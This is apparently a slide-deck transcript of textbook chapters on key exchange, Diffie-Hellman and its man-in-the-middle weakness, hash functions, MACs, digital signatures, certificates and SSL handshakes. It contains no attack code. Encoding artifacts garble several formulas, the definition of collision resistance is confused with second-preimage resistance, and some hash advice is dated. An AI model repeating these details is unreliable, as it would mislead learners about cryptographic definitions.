14.4. Key Agreement and Exchange
Keys have been generated and safely stored, now what? If Alice & Bob both have it, can do symmetric crypto Otherwise, have to agree on key How to create secure communication channel for exchange? Few Options Use Asymmetric Keys Diffie-Hellman (DH) Key Exchange

Using Asymmetric Keys Public-key crypto much more computationally expensive than symmetric key crypto Use RSA to send cryptographically random conversation key k Use k as key for faster symmetric ciphers (e.g. AES) for rest of conversation

A Word of Caution In the following example, as well as some other examples presented in later chapters, the simple toy protocols that we discuss are for instructive and illustration purposes only. They are designed to make concepts easy to understand, and are vulnerable to various types of attacks that we do not necessarily describe. Do not implement these protocols as is in software.

I am Bob. My public key is XYZ.
Key Exchange Example Alice Bob {CK=8a6cd93b2b4f8803}RSA(XYZ) {Hello Alice}AES(8a6cd93b2b4f8803) I am Bob. My public key is XYZ. Asymmetric (e.g. RSA) Alice Bob {k} PK(B) {data}k Symmetric (e.g. AES) We might be able to prevent a man-in-the-middle attack by using public-key crypto to do the key exchange. In the protocol above, the first two messages are still susceptible to spoofing.

14.4.2. Diffie-Hellman (DH) (1)
Key exchange (over insecure channel) without public-key certificates? DH: use public parameters g, p Large prime number p Generator g (of Zp = {1, …, p-1}), i.e. powers g, g2, …, gp-1 produce all these elements Alice & Bob generate rand #s a, b respectively Using g, p, a, b, they can create a secret known only to them (relies on hardness of solving the discrete log problem)

14.4.2. Diffie-Hellman (DH) (2)
Alice Bob ga mod p gb mod p Choose a Choose b Compute (gb)a mod p Compute (ga)b mod p Secret Key = gab mod p In this slide, we will talk about a protocol called Diffie-Hellman (DH) Key Exchange which allows two parties to agree upon a key without ever meeting, and without relying on an alternate secure channel. In DH, both Alice and Bob execute the protocol using some public parameters g and p that everyone knows. P is a (large) prime number, and g is a “generator.” This means that as we raise g to successive powers g^1, g^2, we get back all numbers 0 to p-1. After these two public parameters have been chosen, any two parties that know the public parameters can participate in a key exchange. In DH, Alice generates a random number a, and Bob generates a random number b. Parameters a and b are used to create a key that will be known to only Alice and Bob even if a passive eavesdropper can view the contents of their conversation. This happens as follows: after Alice and Bob choose a and b, respectively, they do not transmit a or b to each other. Instead, Alice transmits gâ mod p to Bob and Bob transmits g^b mod p to Alice. Alice takes the g^b mod p that she received, and raises it to the power a thereby computing g^bâ mod p. Bob takes the gâ mod p that he received, and raises it to the power b thereby computing gâ^b mod p. Now, Alice and Bob both know gâ^b (since g^bâ = gâ^b), and that is the key that they now share. Can Eve possibly have computed gâ^b by eavesdropping? They answer is no. Eve saw gâ and g^b go across the wire, and Eve could multiply these two numbers together, but that will give Eve g^(a+b); not gâ^b! As a result, Alice and Bob are able to agree upon a key even if the channel is susceptible to eavesdropping! However, while DH is not susceptible to passive eavesdropping in with the attacker can only listen to the information going by on the wire, DH is susceptible to active eavesdropping in which the attacker can not only listen to the information going by on the wire, but is also capable of modifying the messages. Eve can compute (ga)(gb)= ga+b mod p but that’s not the secret key!

14.4.2. Man-in-the-Middle Attack against DH
Alice Bob ga gb Choose a Choose b Compute (gm)a Compute (gm)b Mallory Choose m gm Compute (gb)m Compute (ga)m Secret Key = gam Secret Key = gbm Let’s look at how an attacker can construct a “man-in-the-middle” attack against DH. Let’s say that Mallory is able to listen to the communications being exchanged between Alice and Bob and is able to modify the contents. We will see that Mallory will be able to fool Alice in thinking that she has successfully participated in a key exchange with Bob, and that Bob can be fooled into thinking that he has successfully participated in a key exchange with Alice. The protocol starts off as before, with Alice choosing a secret random number, a. Alice sends gâ to Bob, but Mallory intercepts it. Mallory chooses a secret random number, m, and sends g^m to Bob instead of gâ. As a result, Bob receives g^m. Bob also attempts to engage in the protocol as expected: he generates g^b and attempts to send it to Alice. Unfortunately, Mallory intercepts g^b as well, and replaces it with g^m, sending g^m to Alice. Alice ends up computing g^mâ, and Bob ends up computing g^m^b. Mallory can compute both g^mâ and g^m^b. As a result, Mallory will be able to see any message that Alice attempts to send to Bob using the secret key g^mâ, and will be able to see any message that Bob attempts to send to Alice using the secret key g^m^b. Mallory is the “man-in-the-middle” and can impersonate either Alice or Bob. While we have shown that we can do a key exchange using DH, this method is unfortunately susceptible to a man-in-the-middle attack. How can we do a key exchange that is resilient to this attack? Mallory can see all communication between Alice & Bob!

14.4.2. Detecting Man-in-the-Middle Attack
Both Alice and Bob can compute hash of the shared secret h(gab) and display it Mallory’s secret key w/ Bob different from key with Alice (gam ≠ gbm), hashes also different If hashes don’t correspond, then there must have been a man in the middle! Proposed by P. Zimmermann in VoIP protocol ZRTP

Summary Key Management consists of generation, storage, and agreement/exchange Key Types: Identity, Session, Integrity Key Generation Problem is random number generation Use device files or SecureRandom Java API Key Storage: use external devices Key Exchange: Public-key crypto DH – guard against man-in-the-middle attack

CHAPTER 15 MACs and Signatures

Agenda Secure Hash Functions Message Authentication Codes (MACs)
Block cipher based (CBC-MAC) Hash-function based (HMAC) Require sender & receiver to share key Digital signatures – allows anyone (w/o shared key) to verify sender of message

15.1. Secure Hash Functions Given arbitrary-length input, M, produce fixed-length output (message digest), H(M), such that: Efficiency: Easy to compute H One-Way/Pre-Image resistance: Given H(M), hard to compute M (pre-image) Collision resistance: Hard to find M1 ≠ M2 such that H(M1) = H(M2) H M MD=H(M) If you are coming from a computer science background, you may have heard of hash functions before. Hash functions, as used in the world of cryptography, have some similarities and differences from other types of hash functions. Like “regular” hash functions, a cryptographic hash function takes as input some (potentially large) message, M. It then computes a “message digest” h(M) that has the property that if two input message M1 and M2 are different, there is an overwhelmingly high probability that the two hashes h(M1) and h(M2) will be different. A hash function that simply adds the ASCII values of the characters in the message together does not have this property because “AB” and “BA” will have the same hash value even though they are different messages. Cryptographic hash functions use much more sophisticated techniques to ensure this property. The requirements that a cryptographic (secure) hash function must satisfy are three-fold: Efficient. Computing h(M) must be very efficient. One-way (Pre-Image Resistance). Given a message digest MD=h(M), it must be very hard to compute the original message, M. Collision resistance. Given a message digest MD=h(M), it must be very hard to compute a second message, M’, such that its message digest h(M’) = MD. MD = Message Digest

15.1. Secure Hash Functions Examples
Non-Examples: Add ASCII values (collisions): H('AB') = H('BA') Checksums CRC32 not one-way or collision-resistant MD5: “Message Digest 5” invented by Rivest Input: multiple of 512-bits (padded) Output: 128-bits SHA1: developed by NIST & NSA Input: same as MD5, 512 bits Output: 160-bits Two popular hash functions that are used in many systems are MD5 and SHA-1.

15.2. MACs Used to determine sender of message
If Alice and Bob share key k, then Alice sends message M with MAC tag t = MAC(M,k) Then Bob receives M’ and t’ and can check if the message or signature has been tampered by verifying t’ = MAC(M’, k)

15.2.1. CBC MACs Encrypt message with block cipher in CBC mode
IV = 0, last encrypted block can serve as tag Insecure for variable-length messages M1 M2 Mn + + + … k AES k AES k AES tag

15.2.2. HMAC Secure hash function to compute MAC
Hash function takes message as input while MAC takes message and key Simply prepending key onto message is not secure enough (e.g. given MAC of M, attacker can compute MAC of M||N for desired N) Def: Where K is key k padded with zeros opad, ipad are hexadecimal constants

15.3. Signatures (1) Two major operations: P, principal
Sign(M, k) – M is message Verify(M, sig, P) – sig is signature to be verified Signature: sequence of bits produced by Sign() such that Verify(M, sig, P) , (sig == Sign(M, k)) Non-repudiable evidence that P signed M Many applications: SSL, to sign binary code, authenticate source of Use asymmetric encryption ops F & F-1

15.3. Signatures (2) S() & V() : implement sign & verify functions
Signature is s = S(M, ks) =F-1(h(M), ks) Decrypt hash with secret key Only signer (principal with secret key) can sign Verify s: V(M, s, kp) = (F(s,kp) == h(M)) Encrypting with public key Allows anyone to verify a signature Need to bind principal’s identity to their public key

Certificates & CAs (1) Principal needs certificate from CA (i.e. its digital signature) to bind his identity to his public key CA must first sign own certificate attesting to own identity (“root”) Certificate, C(P), stored as text: name of principal P, public key (kp(P)), expiration date C(P) = (Ctext(P), Csig(P)) Root Certificate, C(CA), looks like Ctext(CA) = ("CA", kp(CA), exp) Csig(CA) = S(Ctext(CA), ks(CA))

15.3.1. Certificates & CAs (2) Alice constructs certificate text:
Ctext(Alice)=("Alice", kp(Alice), exp) Authenticates herself to CA (through “out-of-band” mechanism such as driver’s license) CA signs Alice’s certificate: Csig(Alice)=S(Ctext(Alice),ks(CA)) Alice has public key certificate C(Alice)=(Ctext(Alice),Csig(Alice)) Can use to prove that kp(Alice) is her public key

Signing and Verifying Signing: sig = Sign(M, ks(P)) = (S(M, ks(P)),C(P)) Compute S() with secret key: sig.S Append certificate: sig.C Verifying: Verify(M, sig, P) = V(M, sig.S, kp(P)) & V(sig.Ctext(P), sig.Csig(P), kp(CA)) & (Ctext(P).name == P) & (today < sig.Ctext(P).date) signature verifies message? signed by CA? name matches on cert? certificate not expired?

15.3.3. Registration Authorities
Authenticating every principal can burden CA Can authorize RA to authenticate on CA’s behalf CA signs certificate binding RA’s identity to public key Signature now includes RA’s certificate too Possibly many intermediaries in the verification process starting from “root” CA certificate More links in chain, more weak points: careful when verifying signatures Ex: IE would not verify intermediate certificates and trust arbitrary domains (anyone could sign)

Web of Trust Pretty Good Privacy (PGP): digital signatures can be used to sign “Web of trust” model: users sign own certificates and other’s certificates to establish trust Two unknown people can find a certificate chain to a common person trusted by both Source:

15.4. Attacks Against Hash Functions
Researchers have been able to obtain collisions for some hash functions Collision against SHA-1: 263 computations (NIST recommends phase out by 2010 to e.g. SHA-256) MD5 seriously compromised: phase out now! Collision attacks can’t fake arbitrary digital signatures (requires finding pre-images) However could get 2 documents with same hash and sign one and claim other was signed

15.5. SSL Handshake: steps client & server perform before exchanging sensitive app-level data Goal of handshake: client & server agree on master secret used for symmetric crypto Two round trips: 1st trip is “hello” messages: what versions of SSL and which cryptographic algorithms supported 2nd varies based on client or mutual authentication

15.5.1. Server-Authenticated Only (1)
Client creates random pre-master secret, encrypts with server’s public key Server decrypts with own private key Both compute hashes including random bytes exchanged in “hello” to create master secret With master secret, symmetric session key and integrity key derived (as specified by SSL) App Data encrypted with symmetric key

15.5.1. Server-Authenticated Only (2)
Client Server ClientHello ServerHello, Certificate, ServerHelloDone ClientKeyExchange, ChangeCipherSpec, Finished ChangeCipherSpec, Finished Application Data

15.5.2. Mutual Authentication (1)
Client also sends own certificate to server Sends CertificateVerify message to allow server to authenticate client’s public key Pre-master secret set, compute master secret Derive symmetric key & exchange data SSL mechanisms prevent many attacks (e.g. man-in-the-middle) and has performance optimizations (e.g. caching security params)

15.5.2. Mutual Authentication (2)
Client Server ClientHello ServerHello, Certificate, CertificateRequest, ServerHelloDone Certificate, ClientKeyExchange, CertificateVerify, ChangeCipherSpec, Finished Application Data ChangeCipherSpec, Finished

Summary MACs - protect integrity of messages
Compute tag to detect tampering Ex: CBC-MAC, HMAC (relies on secure hashes) Signatures – binds messages to senders Allows anyone to verify sender Prevents forged signatures Use CAs to bind identities to public keys Or use Web of Trust model Application: SSL (“Putting it all together”) Relies on Cryptography: symmetric & public-key And MACs & signatures

Conceptual Exercises List three advantages/disadvantages of using a web of trust model vs. using a certificate authority–based trust model. State how you can use symmetric encryption to achieve (a) authentication, (b) confidentiality, and (c) message integrity.

Programming Problem Extend the AESEncrypter program of Section to compute and verify a MAC on the message in addition to encrypting and decrypting data. Be sure to use different keys for the encryption and MAC computations.

CHAPTER 1 Security Goals

Similar presentations

Presentation on theme: "CHAPTER 1 Security Goals"— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

CHAPTER 1 Security Goals

Similar presentations

Presentation on theme: "CHAPTER 1 Security Goals"— Presentation transcript:

Similar presentations

About project

Feedback